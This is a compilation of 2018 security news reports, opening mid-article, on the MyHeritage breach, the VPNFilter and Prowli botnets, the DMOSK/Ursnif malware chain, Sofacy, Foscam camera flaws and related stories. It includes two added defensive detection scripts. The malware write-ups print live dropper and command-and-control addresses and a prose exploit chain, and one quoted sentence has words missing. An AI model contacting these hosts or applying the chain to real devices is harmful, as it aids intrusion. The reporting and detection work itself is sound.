"Credit card information is not stored on MyHeritage to begin with, but only on trusted third-party billing providers (e.g., BlueSnap, PayPal) utilized by MyHeritage," MyHeritage wrote in a blog post published today.
"Other types of sensitive data such as family trees and DNA data are stored by MyHeritage on segregated systems, separate from those that store the email addresses, and they include added layers of security. We have no reason to believe those systems have been compromised."
MyHeritage also confirmed that there was no evidence of account compromise.

The company also notes that it does not store its customer passwords in plaintext; instead, the affected website uses a hashing algorithm with a unique salt to protect users' passwords, making them more resilient to cracking.
Therefore, your stolen passwords are probably safe, but the company still advised all of its users to change their passwords and choose a strong, unique one, just to be on the safer side.
MyHeritage said it had hired an independent cybersecurity firm to conduct a forensic investigation of the data breach. The company also said it is adding a two-factor authentication feature as an option for users.

Destructive and MiTM Capabilities of VPNFilter Malware Revealed
8.6.2018 thehackernews 

It turns out that the threat of the massive VPNFilter botnet malware that was discovered late last month is beyond what we initially thought.
Security researchers from Cisco's Talos cyber intelligence unit have today uncovered more details about VPNFilter, an advanced piece of IoT botnet malware that infected more than 500,000 routers in at least 54 countries, allowing attackers to spy on users as well as conduct destructive cyber operations.
Initially, it was believed that the malware targets routers and network-attached storage from Linksys, MikroTik, NETGEAR, and TP-Link, but a more in-depth analysis conducted by researchers reveals that the VPNFilter also hacks devices manufactured by ASUS, D-Link, Huawei, Ubiquiti, QNAP, UPVEL, and ZTE.

"First, we have determined that are being targeted by this actor, including some from vendors that are new to the target list. These new vendors are. New devices were also discovered from Linksys, MikroTik, Netgear, and TP-Link," the researchers say.
To hijack devices manufactured by the vendors listed above, the malware simply relies on publicly known vulnerabilities or uses default credentials, instead of exploiting zero-day vulnerabilities.
VPNFilter 'ssler' — Man-in-the-Middle Attack Module

Besides this, the researchers primarily shared technical details on a new stage 3 module, named "ssler," which is an advanced network packet sniffer that, if installed, allows hackers to intercept network traffic passing through an infected router and deliver malicious payloads using man-in-the-middle attacks.
"Ssler module provides data exfiltration and JavaScript injection capabilities by intercepting all traffic passing through the device destined for port 80," the researchers say.
This 3rd-stage module also makes the malware capable of maintaining a persistent presence on an infected device, even after a reboot.
The ssler module has been designed to deliver custom malicious payloads for specific devices connected to the infected network using a parameter list, which defines the module's behavior and which websites should be targeted.
These parameters include settings to define the location of a folder on the device where stolen data should be stored, the source and destination IP address for creating iptable rules, as well as the targeted URL of the JavaScript injection.

To set up packet sniffing for all outgoing web requests on port 80, the module configures the device's iptables immediately after its installation to redirect all network traffic destined for port 80 to its local service listening on port 8888.
"To ensure that these rules do not get removed, ssler deletes them and then adds them back approximately every four minutes," the researchers explain.
To target HTTPS requests, the ssler module also performs an SSLStrip attack, i.e., it downgrades HTTPS connections to HTTP, forcing victim web browsers into communicating over plaintext HTTP.
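As an added example (not Talos' code), the following Python script parses iptables-save style output, constructed here for a hypothetical router, and flags NAT rules that divert TCP web ports to a REDIRECT or DNAT target, the behaviour described for ssler; a second helper compares successive rule snapshots to spot a rule that keeps being re-added after removal, which is what the four-minute re-insertion looks like from the defender's side.

```python
"""Spot iptables rules that divert outbound web traffic to a local port.

Added example, not Talos' code. It reads iptables-save style text and flags
nat-table rules that send TCP port 80/443 traffic to a REDIRECT or DNAT
target, which is how ssler hooks port 80 (redirecting it to 8888).
A second helper compares rule snapshots taken over time, since ssler deletes
and re-adds its rules roughly every four minutes.
"""
import shlex
from typing import Dict, List, Optional

# Constructed sample of `iptables-save` output from a hypothetical router.
SAMPLE_RULES = """\
*nat
:PREROUTING ACCEPT [0:0]
:POSTROUTING ACCEPT [0:0]
-A PREROUTING -p tcp -m tcp --dport 80 -j REDIRECT --to-ports 8888
-A POSTROUTING -o eth0 -j MASQUERADE
COMMIT
*filter
:INPUT ACCEPT [0:0]
-A INPUT -i lo -j ACCEPT
COMMIT
"""


def parse_rules(text: str) -> Dict[str, List[str]]:
    """Group the -A rule lines of iptables-save output by table name."""
    tables: Dict[str, List[str]] = {}
    current: Optional[str] = None
    for raw in text.splitlines():
        line = raw.strip()
        if line.startswith("*"):          # "*nat", "*filter", ...
            current = line[1:]
            tables[current] = []
        elif line.startswith("-A") and current is not None:
            tables[current].append(line)
    return tables


def _opt(tokens: List[str], flag: str) -> Optional[str]:
    """Value following `flag` in a tokenised rule, or None if absent."""
    if flag in tokens:
        i = tokens.index(flag)
        if i + 1 < len(tokens):
            return tokens[i + 1]
    return None


def find_web_redirects(text: str, web_ports=("80", "443")) -> List[dict]:
    """Flag nat rules that REDIRECT/DNAT TCP traffic on the given ports."""
    hits = []
    for rule in parse_rules(text).get("nat", []):
        tokens = shlex.split(rule)
        if _opt(tokens, "-p") != "tcp":
            continue
        dport = _opt(tokens, "--dport")
        target = _opt(tokens, "-j")
        if dport in web_ports and target in ("REDIRECT", "DNAT"):
            hits.append({
                "rule": rule,
                "dport": dport,
                "target": target,
                # REDIRECT uses --to-ports, DNAT uses --to-destination.
                "to": _opt(tokens, "--to-ports") or _opt(tokens, "--to-destination"),
            })
    return hits


def reappearing_rules(snapshots: List[str]) -> List[str]:
    """Rules seen in a snapshot, gone in a later one, then back again.

    Feed this snapshots taken a few minutes apart; a rule that keeps
    returning after removal behaves like the self-repairing ssler rules.
    """
    seen = [
        {rule for rules in parse_rules(snap).values() for rule in rules}
        for snap in snapshots
    ]
    flagged = []
    for rule in sorted(set().union(*seen)):
        presence = [rule in snap for snap in seen]
        for i in range(len(presence) - 2):
            if presence[i] and not presence[i + 1] and any(presence[i + 2:]):
                flagged.append(rule)
                break
    return flagged


if __name__ == "__main__":
    for hit in find_web_redirects(SAMPLE_RULES):
        print(f"suspicious: port {hit['dport']} -> {hit['target']} {hit['to']}")
```

On a real device, run `iptables-save` periodically and pass the captured text to both functions; a legitimate transparent proxy will also show up, so treat a hit as something to explain rather than proof of infection.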
VPNFilter 'dstr' — Device Destruction Module
As briefed in our previous article, VPNFilter also has a destructive capability (dstr module) that can be used to render an infected device unusable by deleting files necessary for normal device operation.
The malware triggers a killswitch for routers, where it first deliberately kills itself, before deleting the rest of the files on the system [named vpnfilter, security, and tor], possibly in an attempt to hide its presence during the forensic analysis.
This capability can be triggered on individual victim machines or en masse, potentially cutting off internet access for hundreds of thousands of victims worldwide.
Simply Rebooting Your Router is Not Enough
Despite the FBI seizure of a key command and control server right after the discovery of VPNFilter, the botnet still remains active, due to its versatile, multi-stage design.
Stage 1 of the malware can survive a reboot, gaining a persistent foothold on the infected device and enabling the deployment of stages 2 and 3 malware. So, each time an infected device is restarted, stages 2 and 3 are re-installed on the device.

This means that, even after the FBI seized the key C&C server of VPNFilter, hundreds of thousands of devices already infected with the malware likely remain infected with stage 1, which later installs stages 2 and 3.
Therefore, rebooting alone is not enough to completely remove the VPNFilter malware from infected devices, and owners of consumer-grade routers, switches, and network-attached storage devices need to take additional measures, which vary from model to model. For this, router owners are advised to contact their manufacturer.
For some devices, resetting routers to factory default could remove the potentially destructive malware, along with removing stage 1, while some devices can be cleaned up with a simple reboot, followed by updating the device firmware.
And as I said earlier, mark these words again: if your router cannot be updated, throw it away and buy a new one. Your security and privacy are more than worth a router's price.

Update Google Chrome Immediately to Patch a High Severity Vulnerability
8.6.2018 thehackernews 

You must update your Google Chrome now.
Security researcher Michał Bentkowski discovered and reported a high severity vulnerability in Google Chrome in late May, affecting the browser on all major operating systems, including Windows, Mac, and Linux.
Without revealing any technical details about the vulnerability, the Chrome security team described the issue as incorrect handling of the CSP header (CVE-2018-6148) in a blog post published today.
"Access to bug details and links may be kept restricted until a majority of users are updated with a fix. We will also retain restrictions if the bug exists in a third party library that other projects similarly depend on, but haven't yet fixed," the Chrome security team notes.
The Content Security Policy (CSP) header allows website administrators to add an extra layer of security to a given web page by letting them control which resources the browser is allowed to load.

Mishandling of CSP headers by your web browser could enable attackers to perform cross-site scripting, clickjacking and other types of code injection attacks on targeted web pages.
The patch for the vulnerability has already been rolled out to users in the stable Chrome update 67.0.3396.79 for Windows, Mac, and Linux, which users may have already received or will receive over the coming days/weeks.
So, make sure your system is running the updated version of the Chrome web browser. We'll update the article as soon as Google releases further updates.
A new version of the Firefox web browser, 60.0.2, has also been released, which includes security and bug fixes, so users of the stable version of Firefox are also recommended to update their browser.

Prowli Malware Targeting Servers, Routers, and IoT Devices
8.6.2018 thehackernews  IoT 

After the discovery of the massive VPNFilter botnet, security researchers have now uncovered another giant botnet that has already compromised more than 40,000 servers, modems and internet-connected devices belonging to a large number of organizations across the world.
Dubbed Operation Prowli, the campaign has been spreading malware and injecting malicious code to take over servers and websites around the world using various attack techniques, including the use of exploits, password brute-forcing and abusing weak configurations.
Discovered by researchers at the GuardiCore security team, Operation Prowli has already hit more than 40,000 victim machines from over 9,000 businesses in various domains, including finance, education and government organisations.

Here's the list of devices and services infected by the Prowli malware:
Drupal and WordPress CMS servers hosting popular websites
Joomla! servers running the K2 extension
Backup servers running HP Data Protector software
DSL modems
Servers with an open SSH port
PhpMyAdmin installations
NFS boxes
Servers with exposed SMB ports
Vulnerable Internet-of-Things (IoT) devices
All the above targets were infected using either a known vulnerability or credential guessing.
Prowli Malware Injects Cryptocurrency Miner

Since the attackers behind the Prowli campaign are abusing the infected devices and websites to mine cryptocurrency or run a script that redirects visitors to malicious websites, researchers believe they are more focused on making money than on ideology or espionage.
According to GuardiCore researchers, the compromised devices were found infected with a Monero (XMR) cryptocurrency miner and the "r2r2" worm—a malware written in Golang that executes SSH brute-force attacks from the infected devices, allowing the Prowli malware to take over new devices.

In simple words, "r2r2 randomly generates IP address blocks and iteratively tries to brute force SSH logins with a user and password dictionary. Once it breaks in, it runs a series of commands on the victim," the researchers explain.
These commands are responsible for downloading multiple copies of the worm for different CPU architectures, a cryptocurrency miner and a configuration file from a remote hard-coded server.
Attackers Also Trick Users Into Installing Malicious Extensions
Besides the cryptocurrency miner, the attackers are also using a well-known open source webshell called "WSO Web Shell" to modify the compromised servers, eventually allowing them to redirect website visitors to fake sites distributing malicious browser extensions.
The GuardiCore team traced the campaign across several networks around the world and found the Prowli campaign associated with different industries.
"Over a period of 3 weeks, we captured dozens of such attacks per day coming from over 180 IPs from a variety of countries and organizations," the researchers said. "These attacks led us to investigate the attackers' infrastructure and discover a wide-ranging operation attacking multiple services."
How to Protect Your Devices From Prowli-like Malware Attacks
Since the attackers are using a mix of known vulnerabilities and credential guessing to compromise devices, users should make sure their systems are patched and up to date and always use strong passwords for their devices.
Moreover, users should also consider locking down systems and segmenting vulnerable or hard to secure systems, in order to separate them from the rest of their network.
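To make the detection side of the r2r2 behaviour and the advice above concrete, here is an added example (not GuardiCore's code) that parses constructed sshd log lines in the standard OpenSSH syslog format and flags a source that fails logins across several usernames within a short window, noting whether a successful login followed the burst.

```python
"""Flag SSH password-guessing bursts in sshd log lines.

Added example, not GuardiCore's code. r2r2 is described as iterating over a
user/password dictionary against random address blocks, so on the receiving
host it shows up as many "Failed password" lines from one source in a short
window, usually across several usernames. The log lines below are
constructed in the standard OpenSSH syslog format.
"""
import re
from collections import defaultdict
from datetime import datetime
from typing import Dict, List

# Constructed sample: one guessing burst (that eventually succeeds) and one
# ordinary user who mistyped a password once before logging in with a key.
SAMPLE_LOG = """\
Jun  8 10:00:01 host sshd[2311]: Failed password for root from 198.51.100.7 port 51022 ssh2
Jun  8 10:00:03 host sshd[2313]: Failed password for invalid user admin from 198.51.100.7 port 51030 ssh2
Jun  8 10:00:04 host sshd[2315]: Failed password for invalid user pi from 198.51.100.7 port 51041 ssh2
Jun  8 10:00:06 host sshd[2317]: Failed password for invalid user ubuntu from 198.51.100.7 port 51052 ssh2
Jun  8 10:00:08 host sshd[2319]: Failed password for root from 198.51.100.7 port 51060 ssh2
Jun  8 10:00:09 host sshd[2321]: Accepted password for root from 198.51.100.7 port 51066 ssh2
Jun  8 10:05:00 host sshd[2400]: Failed password for alice from 203.0.113.9 port 40012 ssh2
Jun  8 10:05:30 host sshd[2402]: Accepted publickey for alice from 203.0.113.9 port 40013 ssh2
"""

LINE_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) (?P<method>\w+) for (?:invalid user )?"
    r"(?P<user>\S+) from (?P<ip>[\d.]+) port \d+"
)


def parse_log(log: str, year: int = 2018) -> List[Dict]:
    """Turn sshd auth lines into events; syslog has no year, so pass it in."""
    events = []
    for line in log.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
        events.append({"time": ts, "result": m["result"], "method": m["method"],
                       "user": m["user"], "ip": m["ip"]})
    return events


def detect_bruteforce(events: List[Dict], threshold: int = 4,
                      window: int = 60) -> List[Dict]:
    """Report sources with >= threshold failed logins inside `window` seconds."""
    by_ip = defaultdict(list)
    for e in events:
        by_ip[e["ip"]].append(e)
    findings = []
    for ip, evs in by_ip.items():
        evs.sort(key=lambda e: e["time"])
        fails = [e for e in evs if e["result"] == "Failed"]
        burst_end = None
        start = 0
        for i, e in enumerate(fails):          # sliding window over failures
            while (e["time"] - fails[start]["time"]).total_seconds() > window:
                start += 1
            if i - start + 1 >= threshold:
                burst_end = e["time"]
                break
        if burst_end is None:
            continue
        # A success from the same source after the burst means guessing worked.
        success_after = any(e["result"] == "Accepted" and e["time"] >= burst_end
                            for e in evs)
        findings.append({"ip": ip, "failed": len(fails),
                         "users": sorted({e["user"] for e in fails}),
                         "success_after_burst": success_after})
    return findings


if __name__ == "__main__":
    for finding in detect_bruteforce(parse_log(SAMPLE_LOG)):
        print(finding)
```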
Late last month, a massive botnet, dubbed VPNFilter, was found infecting half a million routers and storage devices from a wide range of manufacturers in 54 countries with a malware that has capabilities to conduct destructive cyber operations, surveillance and man-in-the-middle attacks.

DMOSK Malware Targeting Italian Companies
8.6.2018 securityaffairs

The security expert and malware researcher Marco Ramilli published a detailed analysis of a new strain of malware, dubbed DMOSK, that targets Italian firms.
Today I'd like to share another interesting analysis made by my colleagues and me. It is a nice and interesting analysis since it targeted many Italian and European companies. Fortunately, the attacker left the LOG.TXT freely available on the dropping URL, letting us know the IP addresses that clicked on the first analyzed stage (yes, we know the companies which might be infected). Unlike what we did with TaxOlolo, we will not disclose the victims' IP addresses and so the companies which might be infected. National CERTs have been involved and have been alerted. Since we believe the threat could radically increase its magnitude in the following hours, we decided to write up this quick and dirty analysis focusing on speed rather than on details. So please forgive some quick and undocumented steps.
Everything started with an email (how about that?!). The email we got had the following body.

Attack Path
A simple link to a drive (drive.carlsongracieanaheim.com) begins our first stage of infection. An email address is given as a parameter to the doc.php script, which records the IP address and the "calling" email address belonging to the victim. The script forces the browser to download a .zip file which, when uncompressed, presents the victim with a JSE file called scan.jse. The file is heavily obfuscated. It was quite difficult to decode the following stage of infection since the JavaScript was obfuscated with at least 3 different techniques. The following image shows the obfuscated sample.

Second Stage: Obfuscated JSE
Unfortunately the second stage is not the final one. Indeed, once we de-obfuscated it, we figured out that it was dropping and executing another file with the .SCR mimetype. From this stage it is interesting to observe that only one dropping URL was called. This is strange behaviour; usually attackers use multiple dropping URLs in order to get more chances to infect the victims. The URL found was the following one:
“url”: “https://drive.carlsongracieanaheim.com/x/gate.php”
The JSE file dropped the third stage into \User\User\AppData\Local\Temp\38781520.scr, with the following hash: 77ad9ce32628d213eacf56faebd9b7f53e6e33a1a313b11814265216ca2c4745. It had previously been analysed by 68 AV engines, but only 9 of them recognised it as a generic malicious file. The following image shows the VirusTotal analysis.

Third Stage: Executable SCR file

Unfortunately, we are still not at the end of the infection chain. The third stage drops and executes another payload. It does not download it from a different dropping website; instead it drops it from a specially crafted memory address (fixed from .txt:0x400000). The following image shows the execution of the fourth stage payload directly from the victim's memory.

Fourth Stage: Dropped PE File
Following the analysis, it has been possible to figure out that the final payload is something very close to Ursnif, which grabs victims' email information and credentials. The following image shows the temporary file built before sending information out to command and control servers.

Temporary File Before Sending data to Command and Control
Like any other Ursnif variant, the malware tries to reach a command and control network located both on the clear net and on the Tor network. The following section will expose the recorded IoCs.

An interesting approach adopted by the attackers is blacklisting. We observed at least 3 blacklists. The first one was based on the victim's IP. We guess (but we have no evidence of that) that the attacker filters responses based on country in order to make a country-targeted attack possible by blacklisting non-targeted countries. The following image shows the temporary file used to store the victim's IP. The attacker could use this information to decide whether or not to respond to a specific malware request.

Temporary File Storing Victim IP Address

A second blacklist that we found was on the dropping URL website, which was configured not to drop files to specific IP addresses. Three main reasons were found for denying the dropped payload:
geo (out of geographical scope). The threat is mainly focused on hitting Italy.
asn (internet service providers and/or cloud providers). The threat is mainly focused on clients and not on servers, so it would make no sense to deliver the payload to cloud providers.
MIT. The attacker does not want the dropped payload to end up with MIT folks; this is quite funny, isn't it?

A small section of the payload-drop blacklist
Blacklists are an interesting approach to reduce the chance of being analyzed; in fact, the blacklisted IPs belong to well-known cybersecurity companies (Yoroi is included), which often use specific cloud providers to run emulations and/or sandboxes.
Personal note: This is a reverse targeting attack, where the attacker wants to attack an entire set of victims except some specific ones, so it introduces a technique to block payload delivery. End personal note.
Now we know how the attack works, so let's try to investigate a little what the attacker messed up. For example, let's try to analyse the content of the dropping URL. Quite fun to find that the attacker left his private key freely available! I will not disclose it… let's say… out of respect for the attacker (? really ?)

Attacker Private Key !
The public certificate used is the following one:

Attacker Certificate
Decoding the fake certificate gives the analyst the following information; of course, none of it is particularly valuable, but it makes for a nice bit of analysis.

Common Name: test.dmosk.local
Organization: Global Security
Organization Unit: IT Department
Locality: SPb
State: SPb
Country: RU
Valid From: June 5, 2018
Valid To: June 5, 2022
Issuer: Global Security
Serial Number: 12542837396936657430 (0xae111c285fe50a16)

Perhaps the most "original" string in the entire malware analysis, in the sense of being written by the attacker without thinking too much, is the string 'dmosk' (in the decoded certificate), hence the malware's name.
As of today we have observed 6617 email addresses that could potentially be compromised, since they clicked on the first stage (evidence on the dropping URL). We have evidence that many organisations have been hit by this malware, which was able to bypass most known security protections since it was behind CloudFlare and did not have a specific bad reputation. We decided not to disclose the "probably infected" companies. Nationwide CERTs have been alerted (June 7, 2018) and together we will contact the "probably infected" companies to help them mitigate the threat.
Please update your rules, signatures and whatever else you have to block the infection.
PS: the threat is quite a bit bigger than what I described, there are several additional components including APK (Android Malware), base ciphers, multi-stage obfuscators and a complete list of “probably infected” users, but again, we decided to encourage the notification speed rather than analysis details.
Hope you might find it helpful.


Russia-linked Sofacy APT group adopts new tactics and tools in last campaign
8.6.2018 securityaffairs APT

The Sofacy APT group (APT28, Pawn Storm, Fancy Bear, Sednit, Tsar Team, and Strontium) continues to operate and, thanks to rapid and continuous changes of tactics, the hackers are able to remain under the radar.
According to experts from Palo Alto Networks, the hackers have also used new tools in recent attacks, and the APT group has recently shifted its focus from NATO member countries and Ukraine towards the Middle East and Central Asia.

The researchers observed several attacks leveraging the SPLM and the Zebrocy tool between the second and fourth quarters of 2017 against organizations in Asia. The list of targeted countries included China, Mongolia, South Korea and Malaysia.

Back to the present, the Sofacy APT group is using a new version of the Zebrocy backdoor written in C++, and the attackers adopted the Dynamic Data Exchange (DDE) attack technique to deliver malware.

The DDE attack technique was exploited to deliver payloads such as the Zebrocy backdoor and the open-source penetration testing toolkit Koadic.

This is the first time that the Russian APT uses the Koadic tool.

“Following up our most recent Sofacy research in February and March of 2018, we have found a new campaign that uses a lesser known tool widely attributed to the Sofacy group called Zebrocy. Zebrocy is delivered primarily via phishing attacks that contain malicious Microsoft Office documents with macros as well as simple executable file attachments.” reads the analysis published by Palo Alto Networks.

“This third campaign is consistent with two previously reported attack campaigns in terms of targeting: the targets were government organizations dealing with foreign affairs. In this case however the targets were in different geopolitical regions.”

Palo Alto noticed a change in the tactics used by the hackers: instead of targeting a handful of employees within an organization, they sent phishing messages to "an exponentially larger number of individuals" within the same organization.

The attackers obtained the list of individuals' emails with simple queries to search engines; this method is also a novelty for the Sofacy APT group.

The researchers linked this campaign to previous attacks; in February, Palo Alto Networks reported that the Sofacy APT group was hiding its infrastructure by using random registrant and service provider information in each attack.

“In our February report, we discovered the Sofacy group using Microsoft Office documents with malicious macros to deliver the SofacyCarberp payload to multiple government entities.” continues Palo Alto.

“In that report, we documented our observation that the Sofacy group appeared to use conventional obfuscation techniques to mask their infrastructure attribution by using random registrant and service provider information for each of their attacks. In particular, we noted that the Sofacy group deployed a webpage on each of the domains.”

Sofacy APT

The investigation on this campaign allowed the experts to discover another campaign leveraging the DealersChoice exploit kit and a domain serving the Zebrocy AutoIT downloader.

The version of the Zebrocy downloader delivered by this domain is the new one written in C++; the downloader was used to spread the Delphi backdoor hosted at IP address 185.25.50[.]93.

The experts discovered the following hard-coded user agent being used by many samples of Zebrocy targeting the foreign affairs ministry of a large Central Asian nation:

Mozilla/5.0 (Windows NT 6.1; WOW64) WinHttp/ (WinHTTP/5.1) like Gecko
The experts found two weaponized Office documents implementing the DDE attack technique; the malicious files were used in attacks against a North American government organization dealing with foreign affairs.

Further details, including IoCs are reported in the analysis published by Palo Alto Networks.

Facebook confirms privacy settings glitch in a new feature exposed private posts of 14 Million users
8.6.2018 securityaffairs Social

Facebook admitted that a bug affecting its platform changed the settings of some 14 million users, potentially exposing their private posts to the public.
This is the worst period in the history of the social network giant that was involved in the Cambridge Analytica privacy scandal that affected at least 87 Million users.

“We recently found a bug that automatically suggested posting publicly when some people were creating their Facebook posts. We have fixed this issue and starting today we are letting everyone affected know and asking them to review any posts they made during that time,” said Erin Egan, Facebook’s chief privacy officer.

“To be clear, this bug did not impact anything people had posted before—and they could still choose their audience just as they always have. We’d like to apologize for this mistake.”

According to Facebook, the glitch affected some of its users who published posts between May 18 and May 27, because during that period it was implementing a new feature for sharing data such as images and videos.

Evidently, something went wrong, and private posts were shared as public by default.

The social network giant confirmed that it corrected the bug on May 22, but it was unable to change the visibility of all the posts.

The company is now notifying affected users and apologizing for the technical issue.

This is the latest embarrassing case involving Facebook in recent weeks; in April, researchers from Princeton reported that Facebook's "Login With Facebook" authentication feature can be exploited to collect user information that was supposed to be private.

Early this week, Facebook confirmed that its APIs granted access to the data belonging to its users to more than 60 device makers, including Amazon, Apple, Microsoft, Blackberry, and Samsung so that they could implement Facebook messaging functions.

The Chinese vendor Huawei was one of the device makers authorized to use the API; in May, the Pentagon ordered retail outlets on US military bases to stop selling Huawei and ZTE products due to the unacceptable security risk they pose.

Facebook highlighted that the agreements were signed ten years ago and that it operated to prevent any abuse of the API.

Multiple models of IP-based cameras from Chinese firm Foscam could be easily hacked. Update the firmware now!
8.6.2018 securityaffairs

A security vulnerability was discovered in webcams, IP surveillance cameras and also baby monitors manufactured by the Chinese firm Foscam.
The Chinese firm Foscam has released firmware updates to address three vulnerabilities in multiple models of IP-based cameras that could be exploited to take control of vulnerable cameras exposed online.

The flaws were reported by experts from IoT security firm VDOO; by chaining the three, attackers could completely take over the Foscam cameras.

The experts from VDOO have published a technical analysis of the three vulnerabilities, including proof-of-concept code.

“One of the vendors for which we found vulnerable devices was Foscam, when our team discovered a critical chain of vulnerabilities in Foscam security cameras. Combining the discovered vulnerabilities, if an adversary successfully obtains the address of the camera, he can gain root access to the affected cameras remotely (over LAN or the internet).” reads the analysis published by VDOO.

“VDOO has responsibly disclosed these vulnerabilities (CVE-2018-6830, CVE-2018-6831 and CVE-2018-6832) and engaged with Foscam security team to solve the matter.”

Below is the attack scenario described by VDOO for a network-accessible camera:

The attack scenario on a network-accessible camera is as follows:

Step 1: An adversary must first obtain the camera’s IP address or DNS name. It can be achieved in several ways, including:
If the camera and the network are configured by the user such that the camera has direct interface to the internet, its address might be revealed by some internet scanners.
If the adversary gained unauthorized (remote or local) access to a network to which the camera is connected, he might be able to find the local address of the camera.
If dynamic DNS is enabled by the user, the adversary might find a way to resolve the device name.
Step 2: The adversary then uses CVE-2018-6830, an arbitrary file deletion vulnerability, to delete certain critical files that will result in authentication bypass when the webService process reloads.
Step 3: The adversary crashes the webService process by exploiting CVE-2018-6832, a stack-based buffer overflow vulnerability in the webService process. After it crashes, the webService process is automatically restarted by the watchdog daemon, and during the process reload, the changes from step 2 take effect. The adversary is now able to gain administrative credentials.
Step 4: The adversary executes root commands by exploiting CVE-2018-6831. This is a shell command injection vulnerability that requires administrator credentials. Since the adversary gained administrator credentials in the previous stage, he can now use this vulnerability to execute commands as the root user for privilege escalation. Full details appear in the Technical Deep Dive below.
Foscam Internet-connected cameras

In June 2017, experts at F-Secure discovered tens of vulnerabilities in tens of thousands of Internet-connected cameras from China-based manufacturer Foscam, but at the time the Chinese firm ignored the report from the security firm.

The experts published a long list of affected Foscam device models and firmware versions; users are urged to update their firmware as soon as possible.

Many camera models from other vendors are likely also affected by the vulnerabilities, because Foscam also supplies its products under white-label arrangements.

Teen Arrested for Hacking Minnesota Government Systems
7.6.2018 securityweek Crime

The United States Department of Justice this week announced the arrest of an individual charged with the hacking of servers owned by the State of Minnesota.

The suspect, Cameron Thomas Crowley, 19, who uses the online handle of Vigilance, made an initial appearance in court on Tuesday, before United States Magistrate Judge Becky R. Thorson in Saint Paul, Minnesota. He remains in federal custody pending his detention hearing.

In addition to announcing Crowley’s arrest, the Department of Justice revealed a five-count indictment that charges the individual with intentional access to a protected computer, intentional damage to a protected computer, and aggravated identity theft.

The indictment alleges that, between May 28, 2017 and June 17, 2017, Crowley intentionally accessed protected servers owned by the State of Minnesota and other entities, without authorization.

In June last year, Vigilance announced on Twitter the hacking of databases belonging to the Minnesota state government and the theft of over a thousand email addresses and corresponding passwords, all of which were dumped online.

The hacker said at the time the action was the result of a jury finding Jeronimo Yanez, a police officer from St. Anthony, Minnesota, not guilty of manslaughter after he shot and killed African-American Philando Castile during a seemingly routine traffic stop in the summer of 2016.

Castile, 32, was shot seven times when he tried to reach for his ID, after he told Yanez he had a gun and a license to carry it. Castile was in the car with his girlfriend and their 4-year-old daughter.

Crowley is also charged with transmitting programs, code, and commands to the compromised servers, causing damage that led to a loss to the State of Minnesota of more than $5,000.

Thus, the alleged hacker is charged with three counts of intentional access to a protected computer and one count of intentional damage to a protected computer. Additionally, the indictment charges Crowley with one count of aggravated identity theft.

The investigation into this case is conducted by the Federal Bureau of Investigation and the Minnesota Bureau of Criminal Apprehension.

92 Million User Credentials Exposed in MyHeritage Data Breach
7.6.2018 securityweek Incident

[Updated] MyHeritage, a DNA and genealogy firm, announced Monday that the access credentials of 92 million users had been stolen. It only discovered the breach when a security researcher informed the company he had found a file named myheritage stored outside of MyHeritage.

The file contains, writes MyHeritage CISO Omer Deutsch in a statement, "the email addresses and hashed passwords of 92,283,889 users who had signed up to MyHeritage up to and including Oct 26, 2017 which is the date of the breach." He stresses that the passwords are stored as "a one-way hash of each password, in which the hash key differs for each customer" (possibly implying that each password is hashed with a unique salt).

Deutsch believes that only the credentials were stolen. "We have no reason to believe that any other MyHeritage systems were compromised." Furthermore, he adds, "we have not seen any activity indicating that any MyHeritage accounts had been compromised." Payment data, user DNA data and family trees have not been affected.

MyHeritage went public with commendable speed – on the same day it learnt of the breach. However, some aspects of the statement are concerning. For example, it immediately set up an incident response team to investigate the incident. Best practice would have such a team already established in anticipation of a breach.

The firm is expediting "work on the upcoming two-factor authentication feature that we will make available to all MyHeritage users soon." Best practice would have had MFA in place long ago. Furthermore, it will 'recommend' rather than require users to employ the MFA option. It also recommends users should change their passwords, when it should perhaps force a password reset on all users.

"It appears that MyHeritage hasn't taken the steps to automatically require users to change passwords, just that they recommend they do," comments Absolute Software's Global Security Strategist Richard Henderson. "That should be an immediate action for any breach of this type. We still don't know (and neither do they) how this information was stolen, or the motives for doing so... and the statement by MyHeritage that they believe no other data was taken, especially unique DNA information and genealogy information, is probably a little premature, until they can determine exactly what happened late last October."

The reassuring tone of the MyHeritage statement is also challenged by Anthony James, CMO of CipherCloud. "Don't believe for a second that a hashed password is safe," he says. "Hashed passwords are absolutely not safe if stolen – these hashed passwords are still highly vulnerable to a dictionary attack, where the attacker runs a hash function against the top 100,000 most popular passwords and computes the hash function against all of them. Then all they need do is compare these calculated values to the list stolen from MyHeritage. So, NO, a smart cyber-attacker could be working diligently, even now, to map the hashed values to real passwords and break the accounts."

The unknown quality of the hashing function could make the credential cracking more difficult, but not necessarily impossible. Furthermore, it may not be necessary if the user has had the same password with the same email address stolen in a different breach with a weak hash function. SecurityWeek has contacted MyHeritage asking for further details on the hashing process, and will update this report with any response.

Rick Moy, CMO at Acalvio, is concerned that MyHeritage did not itself detect the intrusion, "as demonstrated by the seven-month delay, and the fact they were alerted by a third party." The implication is that the firm does not have adequate detection capabilities – and if it failed to detect this, there may be other incidents with the other systems that have also gone undetected.

This possibility also concerns Rashmi Knowles, EMEA Field CTO at RSA Security. "If your password is stolen, it can be updated, but this isn't the case with genetic information," she warns. "You only have one genetic identity, so if this is stolen there are potentially much more serious consequences. But many people don't think about this when applying for such services. No matter how secure the organization, no one is completely risk-free, and if breached, genetic data could be sold on to other hackers without your consent, or the characteristic data it contains could be used to hijack your online accounts. There's even a possibility that hackers can amend or even delete genetic data in some cases, which could have serious implications for the victim and the level of healthcare or even health insurance they could access in the future."

There is potentially an additional side-story to this incident. MyHeritage reports, "We are taking steps to inform relevant authorities including as per GDPR." SecurityWeek has asked MyHeritage to expand on this. Who are the relevant GDPR authorities for MyHeritage?

The firm lists numerous contact phone numbers in various European countries, including the provision of "24/7 support" from the Irish phone. This suggests that the Irish regulator may be the relevant GDPR authority for MyHeritage. There is little doubt that MyHeritage is liable under GDPR, and it seems that it is reachable by the GDPR authorities via its European offices. The only question here is whether Europe will decide to make a high-profile example of MyHeritage early into the GDPR age.

But what about the researcher? Is he or she also liable under GDPR for unsanctioned storage of and access to European PII? It is a moot point. The UK's Information Commissioner's Office has told SecurityWeek that researchers are exempt from GDPR under the principle of 'legitimate interest'.

